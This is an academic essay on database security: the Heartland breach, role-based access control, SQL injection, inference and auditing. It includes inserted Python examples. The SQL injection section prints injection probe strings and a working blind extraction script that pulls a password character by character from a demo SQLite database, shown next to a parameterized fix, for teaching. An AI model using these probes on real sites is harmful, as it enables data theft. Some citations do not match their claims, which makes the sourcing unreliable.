Data Security

Running head: DATA SECURITY 1
Data Security
Name
Institution
Abstract
The 2008 intrusion led by Albert Gonzalez, which exposed more than 130 million payment card numbers processed by Heartland Payment Systems, went down as the largest data breach then on record and a turning point in data security. Data security is a primary concern for most online users, as both intelligence agencies and cyber criminals actively break into systems. Data is among the most valuable assets of the digital era, and attackers exploit vulnerabilities in web applications to reach it for personal gain. Most organizations rely on web-facing applications backed by databases for the safekeeping of sensitive data, but attackers exploit weaknesses such as SQL injection flaws and unauthorized access to reach the servers behind them, steal data and later use it to commit fraud. In response, software engineers have developed application-level controls and database auditing to curb such crime. While application controls are effective at prevention, database auditing does not by itself allow a real-time response to an attack in progress. Reconciling access control with privacy also remains a major obstacle for software engineers. Most people conduct both their personal and their professional lives on mobile devices through social networks and applications, which leaves them exposed to attack. There is therefore a need for greater awareness of data security threats and for more stringent measures to safeguard online users.
Key words: SQL injection, database auditing, access control, role authorization, data inference.
Introduction
In 2008, the 28-year-old Albert Gonzalez led a team of identity thieves who stole approximately 130 million payment card numbers from Heartland Payment Systems, the sixth largest card processor in the United States. Gonzalez, a former Secret Service informant on computer crime, worked with accomplices to identify and exploit weaknesses at Heartland and later to steal from millions of unsuspecting Americans. Heartland discovered the intrusion in 2009 and admitted that it did not know how long the malware had been inside its systems. In August 2009 Gonzalez pleaded guilty to that charge and 19 related charges, and in July 2010 the Data Security Act of 2010, which would hold organizations responsible for the sensitive data they keep, was introduced in the Senate. A recent WikiLeaks release further indicates that state organizations, and not only cyber criminals, are behind the rising level of intrusion into personal data.
In the digital era, data has become one of the most valuable resources available to humankind, and the ever-increasing threats to maintaining and protecting it leave enterprises with a tough task. Under the Data Protection Act, developers have a responsibility to ensure the protection of personal information (Calder & Watkins, 2005). The database is the most widely used platform for storing data since it allows easy access and maintenance. However, a database is also exposed to breaches at several levels: through database and system developers, through employees, and through security officers. A person who seeks to breach a database is an attacker, and may be an insider, an intruder or an administrator. Attacks can be passive or active, and direct or indirect.
The United States government has become increasingly concerned following the numerous database security incidents experienced worldwide. The core purpose of a database security system is to ensure that only authenticated and authorized users gain access to the database. The Privacy Rights Clearinghouse, which started tracking breaches in 2005, reports that over 345 million customer records have been stolen or lost through data security failures, and the cost of a breach has risen to as much as 202 USD per customer record. The largest breach then on record, disclosed in 2009, was perpetrated by three attackers who used SQL injection to exploit a vulnerability and steal 130 million debit and credit card records. Matwyshyn (2009) asserts that 75 percent of data breaches are conducted by outsiders against a mere 20 percent from within the organization. Those who obtain unauthorized access include government personnel, competitors and in-house personnel seeking trade secrets, intellectual property and other sensitive information (Fitzpatrick & Dilullo, 2015, p. 307), and 91 percent of breaches are also linked to criminal groups.
The current digital society exposes online users to attack, with both intelligence agencies and cyber criminals breaching data security for different reasons using straightforward techniques such as unauthorized access and SQL injection. There is therefore a need for more stringent measures to protect individuals from data breaches.
Hacking
Unauthorized access and attack techniques such as SQL injection account for most hacking incidents, even though both are preventable and well understood within the software engineering community. According to Bernik (2014), the sheer number of people using digital platforms has made digital crime harder to curb, so there is a pressing need for greater awareness of and emphasis on data security strategies. It is also notable that criminals are not the only ones hacking. WikiLeaks recently released voluminous files disclosing how intelligence organizations carry out hacking to gain access to personal devices such as mobile phones and personal computers (MacAskill, Thielman, & Oltermann, 2017). The CIA has further automated such malware to gain direct access to mobile devices (Heisler, 2017).
Authorized Access
The central role of database security is to ensure that only authorized users obtain access to a given database, and only at authorized times. The database security system therefore operates by providing controlled and protected access to authorized users. The fundamental principle of the database system was user authentication, which has since proven inadequate on its own given the rising number of hacking incidents that lead to the loss of sensitive data. It is therefore evident that database security still faces a large set of threats that need to be addressed and solutions devised (Shen, 2013). One of the most widespread methods of protection is limiting data access through authentication, access control and authorization. Such provisions grant rights over specific objects to specific users. One widely used strategy is the use of usernames and passwords; a password is a single factor, which is one reason authentication alone has proven insufficient.
Access Control
Access control is another method employed in database security. It determines which subjects (users) may perform which actions, such as read, update, insert and delete, on which objects, including tables, columns and SQL objects such as views and stored procedures. For example, a student would be given read-only access to an online class's database. Access control comes in three main models: Mandatory Access Control (MAC), Discretionary Access Control (DAC) and Role-Based Access Control (RBAC). Under MAC the system enforces access according to security labels assigned centrally to objects and users, so an individual faculty member cannot share a course's records with a student even if they wish to. Under DAC the owner of an object decides who may access it, so a faculty member could grant read access to their own course's data but not to other courses. RBAC, the model most widely used in database systems, groups the permissions needed for a job function into a role: the system identifies objects and operations, assigns access to roles, and users receive the privileges of the roles they hold. For example, the student role receives read-only access, while the head of faculty's role includes updating, editing and creating content on the database. Granting privileges on the basis of role follows the procedure below.
The access control module must be able both to grant and to revoke privileges, and each of these corresponds to an SQL statement. For example, to set up roles for the faculty, the database administrator creates the roles, assigns privileges to each role and then assigns users to roles. A user is thereby granted the privileges of a role automatically upon being assigned to it.
Figure 1. Granting Role Authorization
Similarly, revocation removes users from authorization roles, or removes a role's access to certain objects. Once a role is revoked, the affected members of the faculty lose the access that the role carried.
Figure 2. Revoking role authorization
However, data security issues still arise from this strategy. While granting and revoking role authorization is easy, managing the roles over time is the real task, and the effective functioning of an access control system calls for continuous management (Sales, 2010). Access control modules should follow the general rule of least privilege: the most restrictive set of privileges that still permits the authorized tasks. Building the access control system is complex, and users in an organization change roles constantly, which calls for constant monitoring at considerable cost.
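As an added illustration (not code from the paper, and not any particular database product's implementation), the following Python models the grant and revoke procedure above and enforces it in front of an SQLite database. The roles, users and tables are assumed for the example; real database systems implement the same idea with CREATE ROLE, GRANT and REVOKE statements.

```python
import re
import sqlite3


class AuthorizationError(Exception):
    pass


class RoleBasedAccessControl:
    """Role -> object -> set of actions, plus user -> set of roles.
    A user holds exactly the privileges of the roles currently assigned;
    a grant or revoke takes effect on the very next statement."""

    def __init__(self):
        self.role_privs = {}   # role -> {table -> {"SELECT", "UPDATE", ...}}
        self.user_roles = {}   # user -> {role, ...}

    def grant_privilege(self, role, table, *actions):
        privs = self.role_privs.setdefault(role, {}).setdefault(table, set())
        privs.update(a.upper() for a in actions)

    def revoke_privilege(self, role, table, *actions):
        privs = self.role_privs.get(role, {}).get(table, set())
        privs.difference_update(a.upper() for a in actions)

    def grant_role(self, user, role):
        self.user_roles.setdefault(user, set()).add(role)

    def revoke_role(self, user, role):
        self.user_roles.get(user, set()).discard(role)

    def allowed(self, user, action, table):
        return any(action in self.role_privs.get(role, {}).get(table, set())
                   for role in self.user_roles.get(user, ()))


# Only these four simple statement shapes are recognised; anything else
# (multiple statements, subqueries, joins) is refused rather than guessed at.
_STMT = re.compile(
    r"^\s*(?:(SELECT)\s.+?\sFROM|(INSERT)\s+INTO|(UPDATE)|(DELETE)\s+FROM)"
    r"\s+([A-Za-z_]\w*)\b",
    re.IGNORECASE | re.DOTALL,
)


def classify(sql):
    """Return (action, table) for a statement, or refuse it (fail closed)."""
    m = _STMT.match(sql)
    if m is None or ";" in sql:
        raise AuthorizationError("statement shape not recognised; refused")
    action = next(g for g in m.groups()[:4] if g).upper()
    return action, m.group(5).lower()


def execute_as(db, rbac, user, sql, params=()):
    """Reference monitor: authorize against the role policy, then run."""
    action, table = classify(sql)
    if not rbac.allowed(user, action, table):
        raise AuthorizationError("%s may not %s %s" % (user, action, table))
    return db.execute(sql, params).fetchall()


def build_demo():
    """Constructed faculty database and policy (assumed for this example)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE courses (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO courses VALUES (1, 'Databases')")
    rbac = RoleBasedAccessControl()
    rbac.grant_privilege("student", "courses", "select")          # read-only
    rbac.grant_privilege("faculty", "courses", "select", "update")
    rbac.grant_privilege("head_of_faculty", "courses",
                         "select", "insert", "update", "delete")
    rbac.grant_role("alice", "student")
    rbac.grant_role("bob", "faculty")
    return db, rbac


def denied(db, rbac, user, sql, params=()):
    """True when the monitor refuses the statement for this user."""
    try:
        execute_as(db, rbac, user, sql, params)
    except AuthorizationError:
        return True
    return False


if __name__ == "__main__":
    db, rbac = build_demo()
    print(execute_as(db, rbac, "alice", "SELECT title FROM courses WHERE id = ?", (1,)))
    print(denied(db, rbac, "alice", "UPDATE courses SET title = ? WHERE id = ?", ("X", 1)))
    rbac.revoke_role("bob", "faculty")   # Figure 2: bob loses UPDATE at once
    print(denied(db, rbac, "bob", "UPDATE courses SET title = ? WHERE id = ?", ("X", 1)))
```

The monitor deliberately refuses any statement it cannot classify, which is the fail-closed behaviour an access control module needs; the management burden the text describes is visible in `build_demo`, where every change of job function has to be mirrored by a `grant_role` or `revoke_role`.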
SQL Injection
Weak input handling is another leading source of data threats, enabling attacks such as SQL injection. In SQL injection the attacker deceives the database into executing unauthorized statements by appending extra SQL to an authorized command; the injected text ends up inside the query statements that application programs build. The attack exploits a programmer's failure to validate input or to keep data separate from the SQL statement. The attacker submits malicious queries so as to make the server execute malicious functions and, in the long run, take control of the entire website (Fitzpatrick & Dilullo, 2015). SQL injection thrives on the fact that input from users receives little or no verification before being used directly to generate SQL commands.
Process of an SQL injection attack
An SQL injection attack involves a sequence of steps before the attacker gains full control of the server. The first step is a trial phase in which the attacker uses crafted inputs to inject SQL into application programs (Monahan, 2010). Next, information is extracted from the server in order to gain control of the application. That information is then used to obtain the server administrator's authority and thus full control of the server.
SQL injection flaws
Discovering an SQL injection flaw is often the first step toward a further attack. Attackers begin by identifying the purpose of the database so as to establish which kind of injection suits the attack. The most common probes include adding a single quote or other special character to the end of the original query parameter: if the database responds with an error message, the attacker learns that an injection flaw exists. Another common probe is appending `and 1=1` and then `and 1=2` to the query parameter. If the page with `and 1=1` comes back unchanged while the page with `and 1=2` differs, the input is reaching the SQL statement and the flaw can be exploited. The attacker then issues illegal queries and malicious functions through the flaw. Attackers can also find injection flaws by inspecting the database's built-in variables and functions.
After identifying the flaw, the attacker uses it to cause almost limitless harm, from obtaining confidential information to taking control of both the server and the database. With the flaw in hand, the attacker can extract whatever information the site holds. The first step is to guess the table and column names. The attacker appends `and (select count(*) from TestDB.dbo.tablename)>0` to guess a table name: if the table exists, the page comes back as before and the probe goes unnoticed; if not, the query fails. After obtaining the table and field names, the attacker decodes field values one character at a time by comparing their ASCII codes, after which they hold usernames, passwords and everything else in the database (Spivey & Echeverria, 2015). Those who exploit SQL injection therefore aim for the administrator's credentials, which later let them plant Trojans in the web pages, unlike other methods that only target the account numbers of users on the database.
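The probes in the two sections above, as an added worked example in Python against an in-memory SQLite database (constructed here; this is not code from the paper): a page that concatenates its numeric parameter into the query, the `and 1=1`/`and 1=2` test, the `count(*)` table-existence probe, and character-by-character extraction of a field by comparing code points, beside a parameterized version of the same page that the probes cannot reach. The table and column names are assumptions. The extraction goes one step beyond the text by binary-searching each character's code point rather than guessing characters one by one.

```python
import sqlite3


def build_db():
    """Constructed sample database for the example (not from the paper)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE courses (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO courses VALUES (1, 'Databases'), (2, 'Networks');
        INSERT INTO users VALUES ('admin', 'S3cret!');
    """)
    return db


def vulnerable_page(db, course_id):
    """The bug under discussion: the parameter is concatenated into the SQL
    text, so anything after the number is parsed as part of the statement."""
    sql = "SELECT title FROM courses WHERE id = " + course_id
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return "error"          # the error page that reveals the flaw
    return row[0] if row else "not found"


def safe_page(db, course_id):
    """Hardened form: the input is bound as a value and never parsed as SQL."""
    try:
        row = db.execute("SELECT title FROM courses WHERE id = ?",
                         (int(course_id),)).fetchone()
    except (ValueError, sqlite3.Error):
        return "error"
    return row[0] if row else "not found"


def has_injection_bug(page):
    """The `and 1=1` / `and 1=2` test: the flaw exists when the first probe
    returns the normal page and the second does not."""
    baseline = page("1")
    return page("1 and 1=1") == baseline and page("1 and 1=2") != baseline


def table_exists(page, table):
    """The `and (select count(*) from T)>0` probe: an existing table leaves
    the page unchanged, a missing one makes the query fail."""
    return page("1 and (select count(*) from %s) > 0" % table) == page("1")


def extract_field(page, table, column, where, max_len=32):
    """Boolean-based blind extraction of one field, one character at a time.
    A binary search on the code point needs only seven requests per character."""
    baseline = page("1")
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            probe = ("1 and (select unicode(substr(%s,%d,1)) from %s where %s) > %d"
                     % (column, pos, table, where, mid))
            if page(probe) == baseline:   # code point is above mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # substr() past the end is '', unicode('') is NULL: done
            break
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = build_db()
    vuln = lambda cid: vulnerable_page(db, cid)
    print(has_injection_bug(vuln), table_exists(vuln, "users"))
    print(extract_field(vuln, "users", "password", "username = 'admin'"))
    print(has_injection_bug(lambda cid: safe_page(db, cid)))
```

Note that the extraction never needs an error message once the flaw is confirmed: the attacker only compares each response with the normal page, which is why an application that hides database errors but still concatenates input remains exploitable. The parameterized page turns the same probes into a plain value conversion failure.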
Data Inference
Another threat to data security is inference, the ability to derive information that was not disclosed from information that was. The leading concern is that there is no absolute solution to this problem. Partial remedies include withholding some information during queries and returning deliberately imprecise information, so that a user cannot combine what they receive with what they already know to reconstruct what was withheld. In some instances the user does not set out to derive an individual's data, but since aggregate data is readily available, the user derives it anyway. Lee (2002) gives the example of an employee with access to the remuneration criteria used in the organization: from the classification of job groups, the employee can determine a colleague's income. Likewise, if an employee is denied access to a certain part of the organization's database, they can infer that it contains information with the potential to harm the organization.
Determining solutions to inference is extremely complex. One solution revolves around revoking a user's access to applications based on their query history. The leading challenge is that there is a delay between the time of a query and the implementation of the revocation (Iovan, 2016). Another is deciding on an appropriate response when such a query is detected.
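The salary example above, carried through in Python as an added illustration (constructed data, not code or figures from the paper): an employee who may only see department totals still learns a colleague's salary, a query-set-size restriction blocks the direct query, and a pair of individually allowed queries (a tracker) defeats the restriction, which is the sense in which there is no absolute solution. The table, names and salaries are assumptions.

```python
import sqlite3

MIN_QUERY_SET = 3   # smallest group an aggregate may be computed over


def build_payroll():
    """Constructed payroll table for the example (not from the paper)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE payroll (employee TEXT, department TEXT, salary INTEGER);
        INSERT INTO payroll VALUES
            ('alice', 'research', 70000), ('bob', 'research', 82000),
            ('carol', 'sales', 50000), ('dan', 'sales', 55000),
            ('erin', 'sales', 61000);
    """)
    return db


def aggregate(db, department=None, exclude=None):
    """The only interface an employee has: totals, never individual rows."""
    sql, params = "SELECT SUM(salary), COUNT(*) FROM payroll WHERE 1 = 1", []
    if department is not None:
        sql += " AND department = ?"
        params.append(department)
    if exclude is not None:
        sql += " AND department <> ?"
        params.append(exclude)
    total, count = db.execute(sql, params).fetchone()
    return total or 0, count


def infer_colleague(db, my_salary, department):
    """alice knows her own salary and that the department has two members,
    so the department total alone reveals bob's salary."""
    total, count = aggregate(db, department=department)
    return total - my_salary if count == 2 else None


def restricted_sum(db, department=None, exclude=None):
    """Query-set-size restriction: refuse aggregates over fewer than
    MIN_QUERY_SET rows, so the two-person department cannot be queried directly."""
    total, count = aggregate(db, department, exclude)
    if count < MIN_QUERY_SET:
        raise PermissionError("aggregate over %d rows refused (minimum %d)"
                              % (count, MIN_QUERY_SET))
    return total


def refuses(db, **query):
    """True when the restricted interface rejects the aggregate."""
    try:
        restricted_sum(db, **query)
    except PermissionError:
        return True
    return False


def tracker_attack(db, my_salary):
    """Why there is no absolute solution: each of these two queries covers at
    least MIN_QUERY_SET rows and is allowed, yet their difference isolates the
    two-person department and, with alice's own salary, bob's."""
    everyone = restricted_sum(db)                      # 5 rows
    others = restricted_sum(db, exclude="research")    # 3 rows
    return everyone - others - my_salary


if __name__ == "__main__":
    db = build_payroll()
    print(infer_colleague(db, 70000, "research"))     # bob's salary leaks
    print(refuses(db, department="research"))         # direct query blocked
    print(tracker_attack(db, 70000))                  # leaks anyway
```

The tracker is why the text's other remedies (rounding or perturbing totals, and auditing a user's query history) are needed on top of a size restriction: the delay between a query and any revocation, noted above, is exactly the window in which the two tracker queries run.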
Database Auditing
Database auditing and application-level controls are among the solutions to data security threats. Database auditing tracks users' activities on the database: who accessed it, which actions they performed, and which data changed. Although auditing does not prevent breaches, it enables the administrator to recognize that one has occurred. Categories of database auditing include monitoring of access attempts and of Data Definition Language (DDL), Data Control Language (DCL) and Data Manipulation Language (DML) statements (Hu et al., 2011). Monitoring of access, for example, retains records of both successful and failed login and logoff attempts.
The leading challenge in database auditing is deciding how much information to retain and for how long. A basic audit trail keeps track of users, changes to the database and the sources used to gain access, and lets the administrator trace a user's activities. The most commonly consulted entries in the trail are access attempts, data accessed and modified, attempts to make changes in violation of database policy, and unsuccessful attempts to access data. Another shortcoming is that auditing on its own does not allow a breach to be addressed in a timely manner: the collected data must be analysed, so there is a time gap between the breach and its discovery (Collins, 2014). Although solutions that notify administrators of such violations in real time are being devised, they are not yet the norm.
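As an added example (not from the paper), the following Python reads a constructed audit trail in the four categories named above and evaluates each event as it arrives, which is the real-time notification the text says auditing usually lacks. The line format, the user names and the thresholds are assumptions; real database products write their audit trails in their own formats, so only the detection logic carries over.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Constructed audit trail (not from the paper) in an assumed one-line-per-event
# format: <ISO timestamp> <user> <category> <event> <object> <outcome>.
AUDIT_LOG = """\
2017-03-01T09:00:01 alice ACCESS LOGIN - SUCCESS
2017-03-01T09:00:05 alice DML SELECT courses SUCCESS
2017-03-01T09:01:10 mallory ACCESS LOGIN - FAILURE
2017-03-01T09:01:12 mallory ACCESS LOGIN - FAILURE
2017-03-01T09:01:13 mallory ACCESS LOGIN - FAILURE
2017-03-01T09:01:15 mallory ACCESS LOGIN - FAILURE
2017-03-01T09:01:16 mallory ACCESS LOGIN - FAILURE
2017-03-01T09:01:30 mallory ACCESS LOGIN - SUCCESS
2017-03-01T09:02:00 mallory DDL DROP audit_trail SUCCESS
2017-03-01T09:02:30 bob DCL GRANT courses SUCCESS
2017-03-01T09:03:00 alice DML UPDATE grades FAILURE
"""

LINE = re.compile(r"^(\S+) (\S+) (ACCESS|DDL|DCL|DML) (\S+) (\S+) (SUCCESS|FAILURE)$")
ADMINS = {"dba"}                     # the only accounts expected to run DDL or DCL
FAILED_LOGIN_THRESHOLD = 5
WINDOW = timedelta(seconds=60)


def parse(text):
    """Turn audit lines into event dicts; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, user, category, event, obj, outcome = m.groups()
        events.append({"time": datetime.fromisoformat(ts), "user": user,
                       "category": category, "event": event,
                       "object": obj, "outcome": outcome})
    return events


def summarize(events):
    """Counts per audit category, the breakdown described in the text."""
    return Counter(e["category"] for e in events)


def detect(events):
    """Walk the trail once, raising alerts as events arrive rather than in an
    after-the-fact analysis run. Returns (rule, user, time) tuples."""
    alerts = []
    recent_failures = defaultdict(deque)      # user -> failure times in window
    for e in events:
        if (e["category"] == "ACCESS" and e["event"] == "LOGIN"
                and e["outcome"] == "FAILURE"):
            window = recent_failures[e["user"]]
            window.append(e["time"])
            while window and e["time"] - window[0] > WINDOW:
                window.popleft()
            if len(window) >= FAILED_LOGIN_THRESHOLD:
                alerts.append(("BRUTE_FORCE_LOGIN", e["user"], e["time"]))
                window.clear()                # one alert per burst
        if e["category"] in ("DDL", "DCL") and e["user"] not in ADMINS:
            alerts.append(("PRIVILEGED_CHANGE_BY_NON_ADMIN", e["user"], e["time"]))
        if e["category"] == "DML" and e["outcome"] == "FAILURE":
            alerts.append(("DENIED_DATA_ACCESS", e["user"], e["time"]))
    return alerts


if __name__ == "__main__":
    events = parse(AUDIT_LOG)
    print(dict(summarize(events)))
    for rule, user, when in detect(events):
        print(when.isoformat(), user, rule)
```

The DROP of the audit table by a non-administrator is the event to fear most, since an attacker who can alter the trail can erase the evidence of everything else; the retention question raised above is therefore also a question of where the trail is kept and who may write to it.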
Applications
Application-level controls, by contrast, are more effective at preventing breaches. Most users do not access a database directly but through an application program. Application programs use a security matrix that maps the permitted inputs and outputs. According to Tong (2008), the security matrix is advantageous because its visual form makes it easier to identify where the system could expose data. Changing one aspect of the matrix results in corresponding changes to other aspects of the application, and those changes require authorization to take effect.
Counterargument
In spite of the numerous milestones achieved in data security, the insider threat remains a leading concern with limited solutions. The purpose of an access control mechanism is to allow subjects access to certain objects in order to perform specific actions. The decision made by the access control system permits or denies access on the grounds of identity, location, purpose and time: access control models restrict data access through the user's identity attributes, their location, the purpose of the data usage and the time period. However, these models leave one issue unattended, namely reconciling access control with privacy and applying access control models to social networks and mobile devices. The models require private information such as the user's location and identity attributes.
According to Bertino (2012), such information exposes the user to privacy breaches as well as to potential spear phishing attacks, because access control models rely on the cloud for data management. Maintaining control of data while at the same time protecting privacy rights therefore remains a leading challenge to the elimination of data security threats. Users are particularly concerned about the safety of both their personal and their contextual information, and public concern is rising as most people rely on social networks and mobile devices to run both their personal and their professional lives. Unlike databases, where access control models monitor data access, mobile devices are left responsible for their own control, and it is difficult to establish whether they perform this function effectively (Bernik, 2014).
In conclusion, data security threats and challenges are on the rise, with both organizations and individuals participating actively in cybercrime such as hacking. While organizations such as the CIA attribute their intrusions to security concerns, individuals such as Albert Gonzalez use the same skills for personal gain. The nature of digital technology has made it increasingly easy to breach data security. Databases, which store large volumes of data, have become the primary target of attackers. Attacks can be direct or indirect, with many attackers exploiting weaknesses such as SQL injection flaws to break into other systems.
Several solutions for data breaches exist, among them application-level controls and database auditing. While application controls are largely effective, they fail to address the issue of privacy in relation to access control. Database auditing enables administrators to recognize unauthorized activity in the system, but its greatest shortcoming is that it does not allow a real-time response, since the administrator relies on after-the-fact analysis to recognize a breach. These systems are therefore still being reviewed to produce more effective ones.
The personal and contextual information of online users faces a heightened risk of breach resulting from increased reliance on mobile devices and social networks. Security agencies such as the CIA also breach data in the name of security against terrorist activity. Most mobile users rely on their personal devices for a wide range of personal and professional activities, and the lack of reliable data security controls places them at great risk of attack. It is imperative that there be widespread awareness of data security threats and that the responsible bodies implement more stringent measures to curb cybercrime.
References
Bernik, I. (2014). Cybercrime: The cost of investments into protection. Varstvoslovje, 16(2), 105.
Bertino, E. (2012). Data protection from insider threats. Synthesis Lectures on Data Management, 4(4), 1-91.
Calder, A., & Watkins, S. (2005). IT governance: A manager's guide to data security and BS 7799/ISO 17799. Kogan Page Publishers.
Collins, M. (2014). Network security through data analysis: Building situational awareness. O'Reilly Media.
Fitzpatrick, W. M., & Dilullo, S. A. (2015, July). Cyber espionage and the SPIES taxonomy. Competition Forum, 13(2), 307. American Society for Competitiveness.
Heisler. (2017, March 8). Apple responds to CIA iPhone exploits uncovered in new WikiLeaks data dump. BGR. https://bgr.com/2017/03/08/cia-wikileaks-apple-iphone-hacking-patch. Accessed 12 Mar. 2017.
Hu, F., Qiu, M., Li, J., Grant, T., Taylor, D., McCaleb, S., ... & Hamner, R. (2011). A review on cloud computing: Design challenges in architecture and security. Journal of Computing and Information Technology, 19(1), 25-55.
Iovan, S., & Iovan, A. A. (2016). From cyber threats to cyber-crime. Journal of Information Systems & Operations Management, 425.
Lee, R. B., Fiskiran, A. M., Shi, Z., & Yang, X. (2002). Refining instruction set architecture for high-performance multimedia processing in constrained environments. In Proceedings of the IEEE International Conference on Application-Specific Systems, Architectures and Processors (pp. 253-264). IEEE.
MacAskill, E., Thielman, S., & Oltermann, P. (2017, March 7). WikiLeaks publishes 'biggest ever leak of secret CIA documents'. The Guardian. https://www.theguardian.com/media/2017/mar/07/wikileaks-publishes-biggest-ever-leak-of-secret-cia-documents-hacking-surveillance. Accessed 05 Mar. 2017.
Matwyshyn, A. (Ed.). (2009). Harboring data: Information security, law, and the corporation. Stanford University Press.
Monahan, T. (2010). The future of security? Surveillance operations at homeland security fusion centers. Social Justice, 37(2/3), 84-98.
Sales, N. A. (2010). Mending walls: Information sharing after the USA PATRIOT Act.
Shen, Y. (Ed.). (2013). Enabling the new era of cloud computing: Data security, transfer, and management. IGI Global.
Spivey, B., & Echeverria, J. (2015). Hadoop security: Protecting your big data platform. O'Reilly Media.
Tong, C. K. (Ed.). (2008). Governance of picture archiving and communications systems: Data security and quality management of filmless radiology. IGI Global.
